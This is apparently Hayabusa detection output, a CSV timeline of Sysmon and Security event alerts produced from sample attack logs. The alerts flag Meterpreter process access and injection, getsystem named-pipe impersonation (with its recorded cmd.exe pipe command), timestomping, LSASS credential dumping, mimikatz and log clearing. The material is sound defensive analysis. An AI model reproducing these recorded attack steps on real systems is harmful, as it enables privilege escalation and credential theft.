Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 
+09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 
+09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3028 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001048C10600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3044 | Tgt PGUID: 
365ABB72-F6CA-5CC7-0000-001017C50600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\SearchIndexer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3264 | Tgt PGUID: 365ABB72-F6CF-5CC7-0000-00100C870700,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2500 | Tgt PGUID: 365ABB72-F787-5CC7-0000-001068B30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2024 | Tgt PGUID: 365ABB72-F787-5CC7-0000-0010FBB30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\mmc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2352 | Tgt PGUID: 
365ABB72-F797-5CC7-0000-00105AF70A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1236 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010B31E0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3712 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | 
Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2144 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010CE400E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1344 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-001058500E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:26:34.133 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\vboxsrv\HTools\m.exe | Tgt Process: C:\Windows\explorer.exe | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/meterpreter_migrate_to_explorer_sysmon_8.evtx 2019-04-30 16:46:15.215 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /c echo msdhch > \\.\pipe\msdhch | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4088 | PGUID: 365ABB72-FD47-5CC7-0000-00106AF61D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx 2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx 
2019-04-30 16:46:15.215 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx 2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx 2019-04-30 19:12:45.583 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\system32\cmd.exe | PID: 3292 | PGUID: 365ABB72-1EFA-5CC8-0000-0010D3DE1C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx 2019-04-30 19:13:42.052 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\Explorer.EXE | CreationUtcTime: 2016-02-02 15:30:02.000 | PreviousCreationUtcTime: 2019-04-30 10:12:45.583 | PID: %PID% | PGUID: 365ABB72-16CD-5CC8-0000-0010483A0600,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src 
Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-3FDE-5CC8-0000-0010142B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-3FDF-5CC8-0000-00103C480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-0010014C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: 
\\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00101E4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00104D520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00100D550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx
2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx
